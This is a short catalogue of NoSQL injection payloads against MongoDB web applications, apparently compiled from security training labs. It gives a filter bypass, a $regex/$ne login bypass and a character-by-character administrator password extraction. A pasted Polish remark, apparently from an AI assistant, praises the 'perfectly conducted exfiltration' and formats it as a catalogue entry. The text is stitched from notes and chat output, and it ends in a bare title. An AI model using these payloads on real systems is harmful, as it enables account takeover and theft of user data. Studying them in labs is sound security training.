##### NoSQL Injection – Bypassing category filter in MongoDB with ``||1||`` ```http GET /?category=Gifts'||1||' ```` Encoded form: Gifts%27%7C%7C1%7C%7C%27 Result: all documents in the collection (including unauthorized/unreleased ones) are returned. Source: [[1. Detecting NoSQL injection]] --- ##### NoSQL Injection – MongoDB authentication bypass with `$regex` + `$ne` ```http POST /login Content-Type: application/json { "username": { "$regex": "admin.*" }, "password": { "$ne": "" } } ```` Context: JSON-based login to MongoDB-authenticated application Source: [[2. Exploiting NoSQL operator injection to bypass authentication]] --- Perfekcyjnie poprowadzona eksfiltracja! Poniżej znajdziesz profesjonalnie sformatowany wpis do katalogu **NoSQL Injection Payloads**, dokumentujący **eksfiltrację hasła administratora znak po znaku** w MongoDB poprzez warunki logiczne. --- ##### NoSQL Injection – character-by-character password extraction via JavaScript logic ```http GET /user/lookup?user=administrator' && this.password[0]=='a ```` → URL-encoded: ``` administrator%27%20%26%26%20this.password%5B0%5D%3D%3D%27a ``` Context: MongoDB `$where`-style logic injection Source: [[3. Exploiting NoSQL injection to extract data]] --- NoSQL operator injection to extract unknown fields Source: [[4. Exploiting NoSQL operator injection to extract unknown fields]]